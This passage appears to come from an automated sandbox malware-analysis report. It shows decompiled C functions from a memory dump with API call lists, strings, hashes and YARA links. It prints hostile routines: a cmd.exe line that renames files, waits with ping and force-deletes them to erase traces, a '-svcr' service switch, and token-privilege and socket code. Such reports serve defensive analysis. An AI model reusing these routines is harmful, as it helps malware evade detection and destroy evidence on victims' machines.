					_t29 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
					wsprintfA(_t37, "/c ren \"%s*.*\" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q \"%s*.*\"", _t29, _t19, 0xa, _t29);
					_push(0);
					_push(0);
					_push(0);
					E6F334230(0, "cmd.exe", _t37);
					_t41 =  &(_t41[0xc]);
					HeapFree(GetProcessHeap(), 0, _t37);
				}
				_t28 = M6F34057C; // 0x784250
				wsprintfA( &_v264, "%s%s%c", "Global\\", _t28, 0x4b);
				_t14 = OpenEventA(2, 0,  &_v256);
				_t38 = _t14;
				if(_t38 != 0) {
					SetEvent(_t38);
					return CloseHandle(_t38);
				}
				return _t14;
			}






















                                                                                                                        0x6f3352b0
                                                                                                                        0x6f3352be
                                                                                                                        0x6f3352c5
                                                                                                                        0x6f3352cb
                                                                                                                        0x6f3352cb
                                                                                                                        0x6f3352d0
                                                                                                                        0x6f3352d7
                                                                                                                        0x6f3352e6
                                                                                                                        0x6f3352ec
                                                                                                                        0x6f3352ee
                                                                                                                        0x6f3352fa
                                                                                                                        0x6f3352ff
                                                                                                                        0x6f3352ff
                                                                                                                        0x6f335302
                                                                                                                        0x6f335303
                                                                                                                        0x6f335304
                                                                                                                        0x6f335306
                                                                                                                        0x6f335308
                                                                                                                        0x6f33530d
                                                                                                                        0x6f335319
                                                                                                                        0x6f33531e
                                                                                                                        0x6f335326
                                                                                                                        0x6f335348
                                                                                                                        0x6f33534c
                                                                                                                        0x6f335354
                                                                                                                        0x6f33535d
                                                                                                                        0x6f335363
                                                                                                                        0x6f335374
                                                                                                                        0x6f335376
                                                                                                                        0x6f335378
                                                                                                                        0x6f33537a
                                                                                                                        0x6f335384
                                                                                                                        0x6f335389
                                                                                                                        0x6f335392
                                                                                                                        0x6f335392
                                                                                                                        0x6f335398
                                                                                                                        0x6f3353b0
                                                                                                                        0x6f3353be
                                                                                                                        0x6f3353c4
                                                                                                                        0x6f3353ca
                                                                                                                        0x6f3353cd
                                                                                                                        0x00000000
                                                                                                                        0x6f3353d4
                                                                                                                        0x6f3353e1

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000FA0,?,00000000,?,00000000), ref: 6F335326
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000400,?,00000000,?,00000000), ref: 6F335339
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000), ref: 6F33533C
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33534E
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F33535D
                                                                                                                        • wsprintfA.USER32 ref: 6F335374
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33538F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335392
                                                                                                                        • wsprintfA.USER32 ref: 6F3353B0
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3353BE
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F3353CD
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3353D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$EventProcesswsprintf$AllocCloseCountFreeHandleOpenRandomSleepTick
                                                                                                                        • String ID: %s%s%c$.pdll$/c ren "%s*.*" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q "%s*.*"$Global\$PBx$Printer manager$UniPrint Manager$cmd.exe
                                                                                                                        • API String ID: 1614445722-4243253615
                                                                                                                        • Opcode ID: d5e8fb1faf36eccd384c6db66b398adbb1a0af4d56a0b0f69633068c7a3e876f
                                                                                                                        • Instruction ID: 3eeff7da2809fba3f8b062ba8bb9e4adb4a81316cc12832d6a9a884bedf6cb9d
                                                                                                                        • Opcode Fuzzy Hash: d5e8fb1faf36eccd384c6db66b398adbb1a0af4d56a0b0f69633068c7a3e876f
                                                                                                                        • Instruction Fuzzy Hash: 64315BB3E00BA57BE620E764DC09F5B376DEB46B20F000108F910AB2C0DBB5F4248BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F331100, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142memoryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E6F331100(intOrPtr _a4, intOrPtr _a8) {
				short _v512;
				short _v520;
				short _v1036;
				short _v1040;
				short _v1044;
				short _v1048;
				short _v1052;
				intOrPtr _t24;
				WCHAR* _t39;
				void* _t41;
				intOrPtr _t65;
				void* _t67;
				void* _t73;
				void* _t75;
				long* _t77;

				_t24 = _a4;
				 *_t77 = 0;
				if(_t24 != 2) {
					if(_t24 != 3) {
						goto L16;
					} else {
						CloseHandle( *(_a8 + 0x14));
						return 1;
					}
				} else {
					_t71 = _a8;
					_v1052 =  *(_a8 + 0x10);
					_t75 = E6F33A360( *((intOrPtr*)( *(_a8 + 0x10) + 4)), 0, 0);
					_t77 =  &(_t77[3]);
					if(_t75 != 0) {
						_t73 = E6F33A360( *((intOrPtr*)(_t71 + 4)), ( *(_t71 + 0x1c) & 0x0000ffff) >> 0x00000007 & 0x00000001, 0);
						_t77 =  &(_t77[3]);
						if(_t73 != 0) {
							wsprintfW( &_v1048, L"\\\\.\\%s%s", _t75, _t73);
							_t77 =  &(_t77[4]);
							PathRemoveFileSpecW( &_v1040);
							PathAddBackslashW( &_v1040);
							_t39 =  &_v1040;
							__imp__SHCreateDirectoryExW(0, _t39, 0, _t67);
							if(_t39 == 0 || _t39 == 0x50 || _t39 == 0xb7) {
								wsprintfW( &_v1052, L"\\\\.\\%s%s", _t75, _t73);
								_t77 =  &(_t77[4]);
								_t41 = CreateFileW( &_v1044, 0xc0000000, 0, 0, 4, 0x80, 0);
								if(_t41 != 0xffffffff) {
									L11:
									_v1052 = _t41;
								} else {
									if( *_v1048 != 0 && GetFileAttributesW( &_v1044) != 0xffffffff) {
										_t65 =  *0x6f340270; // 0x0
										wsprintfW( &_v520, L"%s%c%lu%s",  &_v1044, 0x2e, _t65, L".bak");
										_t77 =  &(_t77[6]);
										if(MoveFileExW( &_v1036,  &_v512, 0) != 0) {
											_t41 = CreateFileW( &_v1036, 0xc0000000, 0, 0, 4, 0x80, 0);
											if(_t41 != 0xffffffff) {
												goto L11;
											}
										}
									}
								}
							}
							HeapFree(GetProcessHeap(), 0, _t73);
						}
						HeapFree(GetProcessHeap(), 0, _t75);
					}
					L16:
					return  *_t77;
				}
			}


















                                                                                                                        0x6f331106
                                                                                                                        0x6f33110d
                                                                                                                        0x6f331117
                                                                                                                        0x6f33129b
                                                                                                                        0x00000000
                                                                                                                        0x6f33129d
                                                                                                                        0x6f3312a8
                                                                                                                        0x6f3312b9
                                                                                                                        0x6f3312b9
                                                                                                                        0x6f33111d
                                                                                                                        0x6f33111f
                                                                                                                        0x6f33112b
                                                                                                                        0x6f33113a
                                                                                                                        0x6f33113c
                                                                                                                        0x6f331141
                                                                                                                        0x6f33115d
                                                                                                                        0x6f33115f
                                                                                                                        0x6f331164
                                                                                                                        0x6f33117d
                                                                                                                        0x6f33117f
                                                                                                                        0x6f331187
                                                                                                                        0x6f331192
                                                                                                                        0x6f33119a
                                                                                                                        0x6f3311a1
                                                                                                                        0x6f3311a9
                                                                                                                        0x6f3311c8
                                                                                                                        0x6f3311d0
                                                                                                                        0x6f3311ea
                                                                                                                        0x6f3311ef
                                                                                                                        0x6f331266
                                                                                                                        0x6f331266
                                                                                                                        0x6f3311f1
                                                                                                                        0x6f3311f8
                                                                                                                        0x6f33120a
                                                                                                                        0x6f33122a
                                                                                                                        0x6f33122c
                                                                                                                        0x6f331246
                                                                                                                        0x6f33125f
                                                                                                                        0x6f331264
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331264
                                                                                                                        0x6f331246
                                                                                                                        0x6f3311f8
                                                                                                                        0x6f33126a
                                                                                                                        0x6f331275
                                                                                                                        0x6f33127b
                                                                                                                        0x6f331286
                                                                                                                        0x6f331286
                                                                                                                        0x6f33128e
                                                                                                                        0x6f331297
                                                                                                                        0x6f331297

                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F3312A8
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,?,6F3375D5,?,00000001,00000000), ref: 6F33A37F
                                                                                                                          • Part of subcall function 6F33A360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                          • Part of subcall function 6F33A360: HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        • wsprintfW.USER32 ref: 6F33117D
                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 6F331187
                                                                                                                        • PathAddBackslashW.SHLWAPI(?), ref: 6F331192
                                                                                                                        • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 6F3311A1
                                                                                                                        • wsprintfW.USER32 ref: 6F3311C8
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6F3311EA
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 6F3311FF
                                                                                                                        • wsprintfW.USER32 ref: 6F33122A
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000000), ref: 6F33123E
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6F33125F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33126E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331275
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33127F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331286
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$File$CreateProcesswsprintf$ByteCharFreeMultiPathWide$AllocAttributesBackslashCloseDirectoryHandleMoveRemoveSpec
                                                                                                                        • String ID: %s%c%lu%s$.bak$\\.\%s%s
                                                                                                                        • API String ID: 452034401-1383541090
                                                                                                                        • Opcode ID: fbf9a73df4146104490c5fb3008d180738c3dc9c40fd67268f668b5c1f820ce7
                                                                                                                        • Instruction ID: 63b981e06f3eb6282e5fb6294b6f91e10a03dd73e991e1b444485a580a32a779
                                                                                                                        • Opcode Fuzzy Hash: fbf9a73df4146104490c5fb3008d180738c3dc9c40fd67268f668b5c1f820ce7
                                                                                                                        • Instruction Fuzzy Hash: 2541C273A04394ABD720EBA0CC85FAB77ACEB48B20F004A0CF655D61C0D7B5E414C7A6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004C8504, Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 441threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C8512
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 004C855A
                                                                                                                        • GetLastError.KERNEL32 ref: 004C858A
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 004C87D5
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004C87FC
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004C88C4
                                                                                                                        • GetLastError.KERNEL32 ref: 004C88E0
                                                                                                                          • Part of subcall function 004A2E7D: __EH_prolog3.LIBCMT ref: 004A2E84
                                                                                                                          • Part of subcall function 0040E968: __EH_prolog3.LIBCMT ref: 0040E96F
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004C8989
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004C8A26
                                                                                                                        Strings
                                                                                                                        • process_tools.SetTokenPrivilege: OpenThreadToken for privilege , xrefs: 004C8684, 004C8835
                                                                                                                        • ' not found, xrefs: 004C88F9
                                                                                                                        • process_tools.SetTokenPrivilege: LookupPrivilegeValue for privilege , xrefs: 004C8A5B
                                                                                                                        • failed with error , xrefs: 004C865C, 004C8813, 004C8A39
                                                                                                                        • process_tools.SetTokenPrivilege: Privilege ', xrefs: 004C891E
                                                                                                                        • with error , xrefs: 004C89A0
                                                                                                                        • . Using process token., xrefs: 004C8634
                                                                                                                        • process_tools.SetTokenPrivilege: AdjustTokenPrivileges failed for privilege , xrefs: 004C89C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$H_prolog3$Current$CloseCriticalDeleteHandleProcessSectionThread
                                                                                                                        • String ID: failed with error $ with error $' not found$. Using process token.$process_tools.SetTokenPrivilege: AdjustTokenPrivileges failed for privilege $process_tools.SetTokenPrivilege: LookupPrivilegeValue for privilege $process_tools.SetTokenPrivilege: OpenThreadToken for privilege $process_tools.SetTokenPrivilege: Privilege '
                                                                                                                        • API String ID: 507264954-360949472
                                                                                                                        • Opcode ID: 17df40961581c14ec2d7c137070c1c69f547131effea247b9bd0673728ffc2f7
                                                                                                                        • Instruction ID: 3dbb8db9447217885d83a8932ecef01bed5cd9d2b57d8fc73de6323039766bf2
                                                                                                                        • Opcode Fuzzy Hash: 17df40961581c14ec2d7c137070c1c69f547131effea247b9bd0673728ffc2f7
                                                                                                                        • Instruction Fuzzy Hash: 7A029E7180418CEAEB15EBA4CD95FED7B78AF25308F04819EF44627192EB785F08DB25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004FA79E, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 204sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$_strncmp$H_prolog3Sleep_memset_strlenioctlsocketselect
                                                                                                                        • String ID: $
                                                                                                                        • API String ID: 1920849741-1846248685
                                                                                                                        • Opcode ID: 1a92c313e3ae084b3ff540cd8bc379729239567c1cbd4a5dc6fa70e25aa1ce18
                                                                                                                        • Instruction ID: 907f7e7657ea471fb6a7299b6a9d2a4386095d1e68258f24096403a28a1d6dfd
                                                                                                                        • Opcode Fuzzy Hash: 1a92c313e3ae084b3ff540cd8bc379729239567c1cbd4a5dc6fa70e25aa1ce18
                                                                                                                        • Instruction Fuzzy Hash: 467192B090020AAFDF10EF64CC85DFE7F70FF04355B10452AE9199B2A1D7789A55CB5A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333930, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 102memorystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 97%
                                                                                                                        			E6F333930(void* __ebx, void* _a4) {
				long _v4;
				long _v8;
				CHAR* _t22;
				long _t26;
				int _t33;
				void* _t34;
				void* _t47;
				signed int _t53;
				void* _t54;
				WCHAR* _t56;
				long* _t59;

				if(_a4 == 0) {
					L19:
					return 0;
				}
				_t56 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
				if(_t56 == 0) {
					L18:
					HeapFree(GetProcessHeap(), 0, _a4);
					goto L19;
				}
				_v4 = 0;
				_t22 = GetCommandLineA();
				_v8 = 0;
				_t47 = E6F33A3D0(_t22,  &_v8);
				_t59 =  &(( &_v8)[2]);
				if(_t47 == 0) {
					L17:
					HeapFree(GetProcessHeap(), 0, _t56);
					goto L18;
				}
				_t26 = _v8;
				if(_t26 <= 1) {
					L15:
					LocalFree(_t47);
					if(_v4 != 0) {
						_push( *_a4);
						E6F333610(_t56);
					}
					goto L17;
				} else {
					_t53 = 1;
					do {
						if(_t53 >= _t26 - 1) {
							goto L8;
						}
						if(lstrcmpiA( *(_t47 + _t53 * 4), "-svcr") == 0) {
							_t54 = E6F33A360( *((intOrPtr*)(_t47 + 4 + _t53 * 4)), 0, 0);
							_t59 =  &(_t59[3]);
							if(_t54 != 0) {
								_v4 = 1;
								_t33 = PathIsRelativeW(_t54);
								_t34 = M6F340520; // 0xa4df18
								if(_t33 == 0) {
									_t34 = 0x6f33d664;
								}
								wsprintfW(_t56, L"\"%s%s\"", _t34, _t54);
								_t59 =  &(_t59[4]);
								HeapFree(GetProcessHeap(), 0, _t54);
							}
							L14:
							goto L15;
						}
						_t26 = _v8;
						L8:
						_t53 = _t53 + 1;
					} while (_t53 < _t26);
					goto L14;
				}
			}














                                                                                                                        0x6f333938
                                                                                                                        0x6f333a62
                                                                                                                        0x6f333a67
                                                                                                                        0x6f333a67
                                                                                                                        0x6f333956
                                                                                                                        0x6f33395a
                                                                                                                        0x6f333a50
                                                                                                                        0x6f333a5a
                                                                                                                        0x00000000
                                                                                                                        0x6f333a61
                                                                                                                        0x6f333961
                                                                                                                        0x6f333969
                                                                                                                        0x6f333975
                                                                                                                        0x6f333982
                                                                                                                        0x6f333984
                                                                                                                        0x6f333989
                                                                                                                        0x6f333a3d
                                                                                                                        0x6f333a49
                                                                                                                        0x00000000
                                                                                                                        0x6f333a4f
                                                                                                                        0x6f33398f
                                                                                                                        0x6f333996
                                                                                                                        0x6f333a1f
                                                                                                                        0x6f333a20
                                                                                                                        0x6f333a2b
                                                                                                                        0x6f333a33
                                                                                                                        0x6f333a35
                                                                                                                        0x6f333a3a
                                                                                                                        0x00000000
                                                                                                                        0x6f33399c
                                                                                                                        0x6f3339a3
                                                                                                                        0x6f3339a8
                                                                                                                        0x6f3339ad
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3339bc
                                                                                                                        0x6f3339d7
                                                                                                                        0x6f3339d9
                                                                                                                        0x6f3339de
                                                                                                                        0x6f3339e1
                                                                                                                        0x6f3339e9
                                                                                                                        0x6f3339f1
                                                                                                                        0x6f3339f6
                                                                                                                        0x6f3339f8
                                                                                                                        0x6f3339f8
                                                                                                                        0x6f333a05
                                                                                                                        0x6f333a0b
                                                                                                                        0x6f333a18
                                                                                                                        0x6f333a18
                                                                                                                        0x6f333a1e
                                                                                                                        0x00000000
                                                                                                                        0x6f333a1e
                                                                                                                        0x6f3339be
                                                                                                                        0x6f3339c2
                                                                                                                        0x6f3339c2
                                                                                                                        0x6f3339c3
                                                                                                                        0x00000000
                                                                                                                        0x6f3339c7

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 6F33394D
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333950
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F333969
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • lstrcmpiA.KERNEL32(?,-svcr), ref: 6F3339B8
                                                                                                                        • PathIsRelativeW.SHLWAPI ref: 6F3339E9
                                                                                                                        • wsprintfW.USER32 ref: 6F333A05
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 6F333A11
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 6F333A18
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F333A20
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F333A46
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333A49
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F333A57
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333A5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$AllocLocal$CommandLinePathRelativelstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "%s%s"$-svcr
                                                                                                                        • API String ID: 3712600073-2880469085
                                                                                                                        • Opcode ID: 2a1503044cd5e6b322d5c8dd0cff3f1a752a07c89fd5e798c3304aaa268aec4c
                                                                                                                        • Instruction ID: f1d01fbdc56259cf6174f3107a5da33c84d4c0a8dae534f5d499deeda9a8a1b6
                                                                                                                        • Opcode Fuzzy Hash: 2a1503044cd5e6b322d5c8dd0cff3f1a752a07c89fd5e798c3304aaa268aec4c
                                                                                                                        • Instruction Fuzzy Hash: C731D033D047A9EBDB10DB64CC4AF5ABBADEB46321F008519F855D7140D7B5E814CBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004FA4AB, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 236networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004FA4B2
                                                                                                                        • select.WS2_32(00000002,00000000,00000001,00000000,?), ref: 004FA573
                                                                                                                        • __WSAFDIsSet.WS2_32(?,00000001), ref: 004FA591
                                                                                                                        • send.WS2_32(?,?,?,00000000), ref: 004FA5A7
                                                                                                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,004FF44D,00000000,00000000,00000000,00000001,000003E8,00000000,0000000C,004DC531), ref: 004FA5B4
                                                                                                                        • shutdown.WS2_32(?,00000001), ref: 004FA5EC
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                          • Part of subcall function 004F9BD8: __EH_prolog3.LIBCMT ref: 004F9BDF
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004D6BAE: __EH_prolog3.LIBCMT ref: 004D6BB5
                                                                                                                        • shutdown.WS2_32(?,00000001), ref: 004FA6CF
                                                                                                                        • shutdown.WS2_32(?,00000001), ref: 004FA6DE
                                                                                                                          • Part of subcall function 004BEF63: __EH_prolog3.LIBCMT ref: 004BEF6A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
